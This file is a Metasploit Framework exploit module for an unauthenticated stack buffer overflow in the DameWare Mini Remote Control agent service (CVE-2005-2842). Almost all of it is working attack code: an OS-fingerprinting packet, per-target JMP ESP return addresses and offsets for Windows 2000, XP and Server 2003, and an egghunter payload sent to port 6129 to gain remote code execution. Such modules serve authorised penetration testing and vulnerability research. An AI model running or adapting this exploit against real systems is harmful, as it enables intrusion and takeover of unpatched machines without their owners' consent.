##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::Tcp

	def initialize(info={})
		super(update_info(info,
			'Name'           => 'DameWare Mini Remote Control Client Agent Service <= v4 Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the DWRCS.exe server of DameWare Mini
				Remote Control Client Agent 4.0 - 4.9. While processing a username, the application
				fails to do proper bounds checking before copying data into a small buffer on the stack.
				This causes a buffer overflow and allows to overwrite the base pointer and retn address
				on the stack, allowing for unauthenticated remote code execution. Also, the DWRCS.exe's 
				parent process should not terminate as multiple threads are created on connection. It is
				recommended that payloads with 'nonx' are choosen for exploitation.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Jackson Pollocks',                        # Initial discovery/exploit
					'mr_me <steventhomasseeley[at]gmail.com>', # msf port
				],
			'References'     =>
				[
					['CVE', '2005-2842'],
					['BID', '14707'],
					['OSVDB', '19119'],
					['URL', 'http://www.exploit-db.com/exploits/1190/']
				],
			'Payload'        =>
				{
					'BadChars'    => "\x00",
					'Space'       => 311,
					'DisableNops' => false,
					'Compact'     =>
					 {
						'PayloadType' => 'cmd',
						'RequiredCmd' => 'generic telnet perl ruby'
					}
				},
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'none',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[
						# No NX bypass, payload space too small
						'Windows Server 2003 SP2',
						{
							'Ret'    => 0x77384271, # JMP ESP [user32.dll]
							'Offset' => 195
						}
					],
					[
						# No NX bypass, payload space too small
						'Windows XP SP3',
						{
							'Ret'    => 0x7E429353, # JMP ESP [user32.dll]
							'Offset' => 195
						}
					],
					[
						# No NX bypass, payload space too small
						'Windows 2000 SP4',
						{
							'Ret'    => 0x77e3c256, # JMP ESP [user32.dll]
							'Offset' => 195
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Aug 31 2005",
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(6129)
			], self.class)
	end

	# remote server auto-targeting, ftw
	def auto_target(check)
		os_maj = check[8].unpack('H*')[0]
		os_min = check[12].unpack('H*')[0]

		if os_maj == "05"
			if os_min == "02"
				print_status("Detected the target as Server 2003..")
				my_target = targets[1] # Win Server 23k
			elsif os_min == "01"
				print_status("Detected the target as Windows XP..")
				my_target = targets[2] # Win XP sp3
			elsif os_min == "00"
				print_status("Detected the target as Windows 2000..")
				my_target = targets[3] # Win 2000
			end

		elsif os_maj == "04"
			print_status("Detected the target as Windows NT..")
			print_status("Target unsupported..")
			my_target = Nil
		end

		return my_target
	end

	def exploit
		eggoptions =
		{
			:checksum => false,
			:eggtag => 'w00t',
		}

		# os detection
		os_pkt = ""
		os_pkt << "\x30\x11\x00\x00\x00\x00\x00\x00\xc3\xf5\x28\x5c\x8f\xc2\x0d\x40"
		os_pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
		os_pkt << "\x00\x00\x00\x00\x01\x00\x00\x00"

		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

		connect

		sock.get_once()
		sock.put(os_pkt)

		my_target = target
		if my_target.name == 'Automatic'
			my_target = auto_target(sock.get_once())
		else
			sock.get_once
		end

		sploit = ""
		sploit << "\x10\x27"
		sploit << "\x00" * my_target['Offset']
		sploit << egg
		sploit << [my_target.ret].pack('V')
		sploit << hunter
		sploit << "\x00" * 5000

		print_status("Sending request...")
		sock.put(sploit)
		handler

		disconnect
	end
end
